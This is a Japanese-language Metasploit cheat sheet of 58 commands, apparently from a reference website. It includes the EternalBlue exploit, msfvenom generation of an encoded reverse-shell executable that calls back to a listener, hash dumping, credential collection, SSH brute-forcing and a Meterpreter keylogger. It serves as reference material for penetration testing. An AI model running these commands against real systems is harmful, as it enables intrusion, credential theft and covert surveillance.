Metasploit チートシート
Metasploit Frameworkのクイックリファレンス。msfconsole、モジュール、エクスプロイト、ペイロード、ポストエクスプロイト、Auxiliary、Meterpreter、データベースコマンドを網羅
58 件のコマンド
msfconsoleMetasploitフレームワークのコンソールを起動
msfconsolemsfconsole -qバナーなしでmsfconsoleを起動
msfconsole -qmsfconsole -rリソーススクリプトを指定してmsfconsoleを起動
msfconsole -r commands.rchelp使用可能なコマンドのヘルプを表示
help searchversionMetasploitのバージョン情報を表示
versionexit / quitmsfconsoleを終了
exitbannerMetasploitのバナーを表示
bannersearchモジュールをキーワードで検索
search type:exploit platform:windows smbuse使用するモジュールを選択
use exploit/windows/smb/ms17_010_eternalblueinfoモジュールの詳細情報を表示
info exploit/windows/smb/ms17_010_eternalblueshow options現在のモジュールのオプションを表示
show optionsshow targetsモジュールの対象ターゲットを表示
show targetsshow payloads互換性のあるペイロードを表示
show payloadsback現在のモジュールから離れる
backprevious前に使用したモジュールに戻る
previousset RHOSTSターゲットのIPアドレスを設定
set RHOSTS 192.168.1.100set RPORTターゲットのポート番号を設定
set RPORT 445set LHOSTリスナーのIPアドレスを設定
set LHOST 192.168.1.50set LPORTリスナーのポート番号を設定
set LPORT 4444exploit / runエクスプロイトを実行
exploitexploit -jエクスプロイトをバックグラウンドで実行
exploit -jcheckターゲットが脆弱かどうかを確認
checkset TARGETターゲットのOS/アーキテクチャを指定
set TARGET 0set PAYLOAD使用するペイロードを設定
set PAYLOAD windows/meterpreter/reverse_tcpmsfvenom -pスタンドアロンのペイロードを生成
msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.0.0.1 LPORT=4444 -f exe -o shell.exemsfvenom --list formats利用可能な出力形式を一覧表示
msfvenom --list formatsmsfvenom --list payloads利用可能なペイロードを一覧表示
msfvenom --list payloadsmsfvenom -eエンコーダーを指定してペイロードをエンコード
msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 5 -f exemsfvenom --list encoders利用可能なエンコーダーを一覧表示
msfvenom --list encoderspost/multi/recon/local_exploit_suggesterローカル権限昇格エクスプロイトの候補を提案
use post/multi/recon/local_exploit_suggesterpost/windows/gather/hashdumpWindowsのパスワードハッシュをダンプ
use post/windows/gather/hashdumppost/multi/manage/shell_to_meterpreterシェルセッションをMeterpreterにアップグレード
use post/multi/manage/shell_to_meterpreterpost/windows/gather/enum_logged_on_usersログイン中のユーザーを列挙
use post/windows/gather/enum_logged_on_userspost/linux/gather/enum_configsLinux設定ファイルを収集
use post/linux/gather/enum_configspost/windows/gather/credentials/credential_collectorさまざまなソースから認証情報を収集
use post/windows/gather/credentials/credential_collectorauxiliary/scanner/portscan/tcpTCPポートスキャンを実行
use auxiliary/scanner/portscan/tcpauxiliary/scanner/smb/smb_versionSMBバージョンをスキャン
use auxiliary/scanner/smb/smb_versionauxiliary/scanner/http/http_versionHTTPサーバーバージョンを検出
use auxiliary/scanner/http/http_versionauxiliary/scanner/ssh/ssh_loginSSHログインのブルートフォースを実行
use auxiliary/scanner/ssh/ssh_loginauxiliary/scanner/ftp/ftp_anonymousFTP匿名アクセスの可否をチェック
use auxiliary/scanner/ftp/ftp_anonymousauxiliary/server/capture/http_basicHTTP Basic認証の資格情報をキャプチャ
use auxiliary/server/capture/http_basicsysinfoターゲットシステムの情報を表示
meterpreter > sysinfogetuid現在のユーザーIDを表示
meterpreter > getuidgetsystemSYSTEM権限への昇格を試行
meterpreter > getsystemhashdumpSAMデータベースからハッシュをダンプ
meterpreter > hashdumpshellターゲットのシステムシェルを取得
meterpreter > shellupload / downloadファイルをターゲットとの間で転送
meterpreter > upload /tmp/payload.exe C:\\temp\\screenshotターゲットの画面のスクリーンショットを撮影
meterpreter > screenshotkeyscan_start / keyscan_dumpキーロガーを開始し結果を取得
meterpreter > keyscan_start && keyscan_dumpportfwdポートフォワーディングを設定
meterpreter > portfwd add -l 8080 -p 80 -r 10.0.0.5migrate別のプロセスにMeterpreterを移行
meterpreter > migrate 1234db_statusデータベース接続状態を確認
db_statusdb_nmapNmapスキャンを実行し結果をDBに保存
db_nmap -sV -p 1-1000 192.168.1.0/24hostsデータベース内のホスト一覧を表示
hosts -c address,os_nameservicesデータベース内のサービス一覧を表示
services -p 80,443vulnsデータベース内の脆弱性一覧を表示
vulnscredsデータベース内の認証情報を表示
credsworkspaceワークスペースを管理(プロジェクト分離)
workspace -a project_name